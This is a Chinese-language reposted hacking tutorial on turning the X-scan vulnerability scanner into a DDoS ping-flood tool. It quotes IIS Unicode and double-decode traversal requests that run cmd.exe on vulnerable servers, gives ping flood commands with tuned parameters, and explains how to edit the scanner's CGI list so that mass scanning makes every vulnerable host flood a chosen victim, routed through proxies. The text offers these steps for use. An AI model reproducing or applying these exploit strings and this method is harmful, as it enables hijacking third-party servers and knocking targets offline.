EExcel 丞燕快速查詢2

EExcel 丞燕快速查詢2
EExcel 丞燕快速查詢2 https://sandk.ffbizs.com/

[轉]利用X-scan實現DDoS Ping攻擊

http://www.hkitn.com/article.php/3219
利用X-scan實現DDoS Ping攻擊

一、從這裏說起、、

一開始的時候,不能不說說兩款影響力很大的DDoS Ping炸彈工具。

一個是蝸牛炸彈,一個是AhBomb。

蝸牛炸彈出來的很早,通過實現搜索有漏洞的伺服器做好儲備,呵呵,需要的時候,通過

控制這些有漏洞的伺服器集中 Ping 攻擊目的機,導致目標網路速度變慢,達到DDoS攻擊的目的。

AhBomb是bigball寫的一款更強大的攻擊工具,(呵呵,這裏很感謝他送給我的無限制版)
[IMGA]http://www.patching.net/abu/gongfang/hacking/easyddosping/1.gif[/IMGA]
從本質上說,AhBomb的實現方法和蝸牛炸彈沒有什麼區別,但是由於程式編寫的很優秀,多線程

部分寫的特別完善,而且缺省的參數導致很可能會對被攻擊者帶來致命的打擊。

呵呵

還是分析一下吧:

首先從蝸牛炸彈開始談起

它有一個搜索的過程,搜索unicode漏洞的主機,然後將主機位址保存在Server.dll文件中

在需要實施攻擊的時候,就調動所有的伺服器進行攻擊。

我對一個虛擬目標 200.200.200.200 這個ip進行攻擊,卻省配置下截獲的資料包:
[IMGA]http://www.patching.net/abu/gongfang/hacking/easyddosping/2.gif[/IMGA]
前面的部分

Get /scripts/..%c1%1c../winnt/system32/cmd.exe?/c

是通過unicode編碼調用Windows伺服器的命令解釋器去執行命令。

具體被執行的命令是:

ping -l 65000 -n 500 200.200.200.200

這裏解釋如下:

ping 一個發送測試資料包檢測網路狀況的命令

-l 64000 發送包含由64000位元組資料量的 ECHO 資料包

-n 500 發送500遍 ECHO 請求資料包

200.200.200.200 目標ip,呵呵

現在看的很清楚了吧,也不用多說。

 

這些命令雖然簡單,但由於ping命令的使用只需要最低限度的用戶許可權,而具有unicode漏洞的

機器又非常多,這才會導致大量的資料湧向一處。於是、、掛了。

 

 

我們來看看AhBomb做了些什麼。
[IMGA]http://www.patching.net/abu/gongfang/hacking/easyddosping/3.gif[/IMGA]
前面的部分

Get /scripts/..%%255c..%255cwinnt/system32/cmd.exe?/c

是通過unicode編碼調用Windows伺服器的命令解釋器去執行命令,比較新的編碼所以找到的

漏洞伺服器應該會更多。

具體被執行的命令是:

ping 192.168.0.1 -t -i 255

這裏解釋如下:

ping 一個發送測試資料包檢測網路狀況的命令

-t 不停的發送 ECHO 資料包,是的,不停

-i 255 TTL值設為255(最大)

192.168.0.1 目標,呵呵

 

仔細看看它的參數和蝸牛炸彈的不同,具體體現在它並沒有發送大資料包,而僅僅是發送的

普通大小的包,因為很多網路設備會過濾大包,標準格式的反而才能真正被發送到目標。

 

這裏附:(TTL:生存時間,指定資料報被路由器丟棄之前允許通過的網段數量。TTL 是由發送主機

設定的,以防止資料包不斷在 IP 互聯網路上永不終止地迴圈。轉發 IP 資料包時,要求路由器

至少將 TTL 減小 1。 )

 

 

二、一款經典的掃描工具X-scan

X-scan,安全焦點的又一力作,從一開始的構想,到現在的全開放式結構設計,這種執著的精神,

難道不正是我們所追求的麼?、、、

重點從它的cgi掃描功能談起

選中Tools中的CGI列表維護功能,可以看到其中列出了從Windows到各個版本Unix系統

可能存在的cgi漏洞的列表。

[IMGA]http://www.patching.net/abu/gongfang/hacking/easyddosping/4.gif[/IMGA]
它是如何驗證伺服器是否存在漏洞?

調用命令解釋器,執行 dir 命令!

換一換你的思維模式,用一個hacker的思維模式去想

調用 dir 命令可以,我們為什麼不能調用其他的命令呢?

呵呵

這就是我要說的重點了

如果我把

/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir

替換成

/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ping+-t+-i+255+-w+5+192.168.0.1

、、、

ping -t -i 255 -w 5 192.168.0.1

為什麼用這個命令?

為了不被網路設備過濾掉,所以不發送大資料包。

為了能夠讓我們的資料包達到目標,我們設定TTL值為255。

-w 5 參數,指定超時間隔為5毫秒,不管對方返回資訊是什麼,不停的發,呵呵,這對一些過濾ICMP包

的伺服器還是很管用的。

我打開cgi.lst檔,手工編輯其中的內容

經過測試目前打了SP2以後仍然會有編碼漏洞的就是 IIS-DECODE 二次編碼漏洞了。

我保留了兩個最有可能的方式庫,整理如下:

測試的目標ip為:192.168.0.1

[IMGA]http://www.patching.net/abu/gongfang/hacking/easyddosping/5.gif[/IMGA]
打開Tools中的CGI列表維護選擇新的修改後的列表
[IMGA]http://www.patching.net/abu/gongfang/hacking/easyddosping/6.gif[/IMGA]
到這裏,我們只要通過X-scan去大規模的掃描cgi漏洞,就可以實施對目標伺服器的DDoS Ping攻擊了。

到最後,囉嗦一下,其實用任何一個平臺下的cgi掃描工具,稍作修改,都可以實現我們的目的。

用X-scan做講解是因為它的出色,以及它在掃描cgi漏洞的時候是支援代理伺服器連接的。